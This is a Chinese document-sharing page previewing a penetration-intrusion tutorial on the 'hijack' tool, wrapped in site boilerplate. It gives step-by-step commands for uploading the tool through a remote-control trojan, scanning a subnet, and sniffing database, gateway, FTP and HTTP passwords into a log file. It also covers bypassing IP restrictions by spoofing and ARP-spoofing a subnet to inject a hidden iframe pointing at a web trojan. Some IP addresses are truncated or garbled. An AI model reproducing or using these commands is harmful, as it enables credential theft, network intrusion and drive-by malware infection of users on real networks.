版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、前面介绍过一些入侵渗透用的小工具,如AIO和MT等,这些小工具的功能都非常强大,可以实现各种渗透入侵控制功能。但同时这些工具也有不足之处,即不具备ARP欺骗攻击的功能。 ARP欺骗攻击在内网渗透中的作用是极大的,因此这里介绍一个具有ARP欺骗功能的渗透小工具hijack。这个小巧但功能强大的工具,具备各种强大的功能,可以进行远程渗透入侵。1上传hijack,安装嗅探组件hijack解压后,里面有3个文件:"hijack.exe"、"winpcap.exe"和"old.exe"。其中"hijack.exe"和&quo
2、t;winpcap.exe"是必需的。前者是程序主文件,后者是嗅探所需Winpcap数据包的自解压版本。首先,攻击者要将hijack上传到远程主机上,可以使用远程控制木马或溢出Shell窗口进行上传,如图8-67所示。这里选择上传到C盘根目录下。返回到远程命令控制窗口中,执行命令:1 dir c:hijack.exe 如果显示文件,则表示上传文件成功。然后执行"c:winpcap.exe"命令,会自动解压所需的嗅探组件到系统目录下,如图8-68所示。在使用"hijack.exe"工具进行渗透入侵前,必须安装winpcap组件,否则会弹出错误提示
3、,如图8-69所示。2查获远程网络信息入侵控制的主机,可能是单独的一台主机,也可能位于某个网络中;主机上可能只安装了一块网卡,也可能安装了多块网块-全面地了解远程主机上的网络信息是进一步渗透入侵攻击前所必需的。在远程控制木马的命令控制窗口中,执行命令:2 hijack /L 可以看到远程主机上网卡的设备名、IP地址、MAC物理地址和子网掩码等各种网络信息,如图8-70所示。其中,比较重要的是"idx"列显示的信息,也就是网卡索引号。如果是单网卡,那么网卡索引号为1。现在要扫描远程主机子网中所有的主机IP地址,命令格式为:3 hijack exe -d 网卡索引号 /s由于是
4、单网卡,可以直接执行命令:4 hijack -d 1 /s 可以从远程主机所在的子网中扫描并显示所有主机的IP地址,以及其网卡的MAC物理地址。这里可以看到,在子网中有3台主机,如图8-71所示。3嗅探子网主机的密码在进行渗透入侵时,嗅探具有非常重要的作用,尤其是在入侵网站服务器网络时。利用嗅探,可以获得子网中其他主机的管理员密码,或者是网站登录密码、邮箱或FTP登录密码等。1)嗅探数据库的密码例如,控制网站服务器主机内网的IP地址是"",在子网中另一台主机的IP地址是"0",该主机是网站的数据库服务器。攻击者
5、想获得数据库的连接密码,可以嗅探主机""的所有网络连接数据。在远程控制木马的命令控制窗口中,执行嗅探命令(见图8-72)5 hijack -d 1 -O pass.log 192.168.1.* 6 0 该命令可以嗅探所有"192.168.1.*"网段的主机与数据库服务器""之间的网络信息数据,并从中捕获密码,保存在"pass.log"文件中。也可以直接使用如下命令:7 hijack -d 1 -O pass.log 192.168.1.* 192.
6、168.1.1嗅探所有主机与网关服务器之间的数据交换,从而获得其登录密码并直接从外网登录网关。以上命令,只是进行单向嗅探,我们也可以添加参数"-f"进行双向嗅探,命令格式如下:8 hijack -d 1 -f -O pass.log 192.168.1.* 0 另外,我们也可以设置嗅探指定协议的密码,如嗅探FTP密码,可执行命令:9 hijack -d 1 -r -f -O pass.log 192.168.1.* 0 "USER|PASS" "tcp and dst port 21"要嗅探
7、常见的HTTP密码,可执行命令:10 hijack -d 1 -r -f -O pass.log 192.168.1.* 0 "username=|password=" "tcp and dst port 80" 2)查看嗅探数据执行了后台嗅探后,嗅探的结果会保存在远程主机上。显示嗅探结果的命令为:10 hijack.exe -I pass.log 执行命令后,就可以看到嗅探记录文件中保存的所有嗅探数据了,如图8-73所示,通过分析查看即可获得密码。3)IP地址欺骗攻击,突破内网连接限制通过前面嗅探到的密码可以进行远程连接,以控制子
8、网中的其他主机。但是这些子网中的主机,往往通过防火墙或其他方式设置了连接限制,只允许与指定IP地址的主机进行连接,此时可以通过hijack的IP地址欺骗功能来渗透入侵连接受限制的主机。这里假设在子网内某台计算机公网的IP地址为"3",该主机设置了IP地址限制,只允许IP地址"7"访问,而攻击者本机的IP地址是"2",如果想入侵这台连接受制限的主机,可以执行命令(见图8-74):11 hijack -d 1 -z 3
9、 2 7其中,""是该网段的网关IP。执行该命令后,攻击者就可以突破IP地址限制,连接上原本受限制的主机了。4)ARP欺骗攻击在渗透入侵攻击中,如果无法进行嗅探,或者难以突破内网与外网,那么ARP欺骗攻击就可以大显身手了。hijack的ARP欺骗攻击可以在子网内其他主机与网关的数据交换中,任意添加修改网络数据,以达到挂马攻击的目的。例如,已经有了一个网页木马,地址为"(1)编写规则文件。打开记事本,编写如下内容的文本文件:12 - 13 HTML> 14 - 15 <iframe src=htm width=0 height=0>iframe>HTML> 将文件保存为"job.txt",然后上传到远程主机与hijack所在的文件夹下,该文件作为ARP欺骗规则文件。(2)实施ARP欺骗攻击。在远程命令控制窗口中,执行如下命令(见图8-75):16 hijack -d 1 -v -p 80 -S 100 -F job.txt 17 192.168.1.* 命令执行后即可对子网内的所有主机进行ARP欺骗攻
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 中班《好朋友的生日》课件
- 中班《水族馆》课件
- 如何制定全面有效的团队计划
- 新兴岗位职业发展策略计划
- 急救措施应急演练培训
- 生物专题讲座活动安排计划
- 如何提升生产设备的利用率计划
- 农业行业安全保障工作的总结计划
- 兴趣小组与社团活动安排计划
- 新高考英语一轮复习考点一遍过专题25-语法填空综合技巧原卷版
- 苏科版一年级心理健康教育第5节《我们一起玩》课件(定稿)
- 初二上册期末地理知识点归纳总结
- 大象版2022-2023五年级科学上册《3-4我是小小安全员》课件
- CRF病例报告表模板
- 31答复一通意见陈述书正文
- 二年级苏教版数学上册《认识厘米》教案(市级公开课)
- 课程考试考场情况记录表(模板)
- 2022全国自考警察伦理学考前试题和答案
- 教研《My clothes Let's talk》评课稿6月
- 艺人演艺经纪合同(全约+独家)、一次演出服务合同(个人签署)、综艺节目海报委托设计服务合同--《民法典》修订版
- 主题班会:拍卖会ppt课件
评论
0/150
提交评论